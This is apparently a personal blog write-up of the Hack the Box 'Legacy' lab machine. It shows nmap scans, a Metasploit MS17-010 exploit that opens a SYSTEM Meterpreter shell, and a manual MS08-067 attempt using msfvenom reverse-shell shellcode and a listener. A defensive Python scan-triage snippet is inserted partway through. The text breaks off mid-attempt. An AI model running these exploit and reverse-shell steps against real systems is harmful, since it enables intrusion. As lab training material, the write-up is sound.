Legacy

In this blog post, we take a look at the Legacy Windows machine on the “Hack the Box” platform. The writeup was completed on January 23rd, 2023 and highlights the importance of enumeration in penetration testing. By utilizing nmap's --script vuln option during the enumeration process, we were able to gather crucial information that ultimately led to a successful exploit. I had missed this step and was going down a rabbit hole chasing the wrong exploit. Additionally, if the exploit repeatedly fails, resetting the machine on Hack the Box and trying again can be a helpful troubleshooting step.

Create Machine Working Directory

┌──(kali㉿kali)-[~]
└─$ mkdir HTB
┌──(kali㉿kali)-[~]
└─$ cd HTB
┌──(kali㉿kali)-[~/HTB]
└─$ mkdir Legacy
┌──(kali㉿kali)-[~/HTB]
└─$ cd Legacy
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ 

Enumeration

I always use the following nmap flags after creating a directory with the box name:

└─$ nmap -sV -sC -oA nmap 10.10.10.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-22 02:58 EST
Nmap scan report for 10.10.10.4
Host is up (1.0s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m38s, deviation: 1h24m49s, median: 4d23h57m40s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9557f (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-01-27T11:58:31+02:00

Ports 139 and 445 are open, which are used for NetBIOS and SMB. The machine is likely a Windows XP machine, as per the Nmap results.

Ran an Nmap scan against ports 139 and 445 with --script vuln:

kali@kali ~/H/Legacy> nmap -p 139,445 --script vuln 10.10.10.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-22 06:20 EST
Nmap scan report for 10.10.10.4
Host is up (0.43s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrar
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Nmap done: 1 IP address (1 host up) scanned in 34.59 seconds

The scan reports two vulnerabilities: “Microsoft Windows system vulnerable to remote code execution (MS08-067)” and “Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)”.
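An added example (not part of the original writeup): a small Python triage of the `--script vuln` output above that separates confirmed findings from checks that returned no verdict, since a bare `false` or an `ERROR` line is not a clean result. The function names are assumptions made for this illustration, and the sample is abbreviated from the scan output shown above.

```python
import re

# Sample input: abbreviated from the scan output shown above.
SAMPLE = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
"""

HEADER = re.compile(r"^\|[_ ]([A-Za-z0-9_-]+):\s*(.*)$")  # "| script-id:" or "|_script-id: result"
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_vuln_findings(text):
    """Return one dict per NSE script block found in nmap's normal output."""
    findings, cur = [], None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            cur = None                      # left the script-results section
            continue
        m = HEADER.match(raw)
        if m:                               # start of a new script block
            cur = {"script": m.group(1), "inline": m.group(2).strip(),
                   "state": None, "cves": []}
            findings.append(cur)
            continue
        if cur is None:
            continue
        body = raw.lstrip("|_ ").strip()    # indented detail line of the block
        if body.startswith("State:"):
            cur["state"] = body.split(":", 1)[1].strip()
        for cve in CVE.findall(body):       # IDs line and reference URLs repeat the CVE
            if cve not in cur["cves"]:
                cur["cves"].append(cve)
    return findings

def status(finding):
    """Only an explicit State field counts as a verdict."""
    state = (finding["state"] or "").upper()
    if state.startswith("NOT VULNERABLE"):
        return "not_vulnerable"
    if "VULNERABLE" in state:
        return "vulnerable"
    return "inconclusive"   # bare "false", ERROR, negotiation failure: re-check

def triage(text):
    """Group script ids by status so confirmed findings and gaps are both visible."""
    groups = {"vulnerable": [], "not_vulnerable": [], "inconclusive": []}
    for f in parse_vuln_findings(text):
        groups[status(f)].append(f["script"])
    return groups
```

Running `triage()` on saved scan output gives a patch list (the `vulnerable` group with its CVEs) and a re-scan list (the `inconclusive` group) for the same host.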

Exploit – Option 1 – Metasploit

Did a search for both ms17-010 and MS08-067:

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Found some RCE modules for MS17_010 and, after trying some of them, I found “exploit/windows/smb/ms17_010_psexec” to work. So I loaded the module:

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting           Required  Description
   ----                  ---------------           --------  -----------
   DBGTRACE              false                     yes       Show extra debug trace info
   LEAKATTEMPTS          99                        yes       How many times to try to leak transactio
                                                             n
   NAMEDPIPE                                       no        A named pipe that can be connected to (l
                                                             eave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-fr  yes       List of named pipes to check
                         amework/data/wordlists/n
                         amed_pipes.txt
   RHOSTS                10.10.10.4                yes       The target host(s), see https://github.c
                                                             om/rapid7/metasploit-framework/wiki/Usin
                                                             g-Metasploit
   RPORT                 445                       yes       The Target port (TCP)
   SERVICE_DESCRIPTION                             no        Service description to to be used on tar
                                                             get for pretty listing
   SERVICE_DISPLAY_NAME                            no        The service display name
   SERVICE_NAME                                    no        The service name
   SHARE                 ADMIN$                    yes       The share to connect to, can be an admin
                                                              share (ADMIN$,C$,...) or a normal read/
                                                             write folder share
   SMBDomain             .                         no        The Windows domain to use for authentica
                                                             tion
   SMBPass                                         no        The password for the specified username
   SMBUser                                         no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

My IP settings via ifconfig:

┌──(kali㉿kali)-[~]
└─$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:87:de:82:d0  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.248.128  netmask 255.255.255.0  broadcast 192.168.248.255
        inet6 fe80::d387:8bfe:48bc:4ce7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bc:43:f0  txqueuelen 1000  (Ethernet)
        RX packets 22031  bytes 3368402 (3.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16822  bytes 3126743 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 35  bytes 3412 (3.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 35  bytes 3412 (3.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.16.2  netmask 255.255.254.0  destination 10.10.16.2
        inet6 dead:beef:4::1000  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::a36a:c939:bf36:c0ff  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 6125  bytes 1179643 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8403  bytes 1166432 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Ran the exploit and got a Meterpreter session. Got both the root and user flags. Exploit completed.

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8609b158
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... bZbjYAEN.exe
[*] 10.10.10.4:445 - Created \bZbjYAEN.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \bZbjYAEN.exe...
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.4:1032) at 2023-01-22 15:48:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > searh -f root.txt
[-] Unknown command: searh
meterpreter > search -f root.txt
Found 1 result...
=================

Path                                                      Size (bytes)  Modified (UTC)
----                                                      ------------  --------------
c:\Documents and Settings\Administrator\Desktop\root.txt  32            2017-03-16 02:18:50 -0400

meterpreter > search -f user.txt
Found 1 result...
=================

Path                                             Size (bytes)  Modified (UTC)
----                                             ------------  --------------
c:\Documents and Settings\john\Desktop\user.txt  32            2017-03-16 02:19:49 -0400

meterpreter > 

Option 2 – Manual Method

After the nmap scan flagged the MS08-067 and MS17-010 vulnerabilities, I did a search on searchsploit. I went with “windows/remote/7104.c” and added it to my working directory with the command “searchsploit -m windows/remote/7104.c”.

└─$ searchsploit MS08-067             
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                                                                          | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                                                           | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                                                                     | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                                                                      | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                                                                 | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                                                                 | windows/remote/7132.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ searchsploit -m windows/remote/7104.c  
  Exploit: Microsoft Windows Server - Code Execution (MS08-067)
      URL: https://www.exploit-db.com/exploits/7104
     Path: /usr/share/exploitdb/exploits/windows/remote/7104.c
    Codes: OSVDB-49243, CVE-2008-4250, MS08-067
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/HTB/Legacy/7104.c

After trying to work with some of the exploits above with no luck, I found an exploit via Reddit at the following link: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py. I used wget to get the code:

┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
--2023-01-22 16:26:19--  https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12287 (12K) [text/plain]
Saving to: ‘ms08-067.py.1’

ms08-067.py.1                                        100%[===================================================================================================================>]  12.00K  --.-KB/s    in 0s      

2023-01-22 16:26:20 (24.8 MB/s) - ‘ms08-067.py.1’ saved [12287/12287]

                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ 

After going through the code, we have to create our own shellcode via msfvenom for our machine and replace it in the code:

┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes

Replaced this in the code:

# Reverse TCP to 192.168.119.204 port 62000:
shellcode=(
)
# ------------------------------------------------------------------------

Set up a multi/handler listener via Metasploit:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.2:443 


ms08-067.py.1 10.10.10.4 445 “

I tried a number of times to get the reverse shell but without success, and just as I was about to give up on this vector, I decided to reset the machine on Hack the Box just in case it needed a refresh and then ran the exploit again.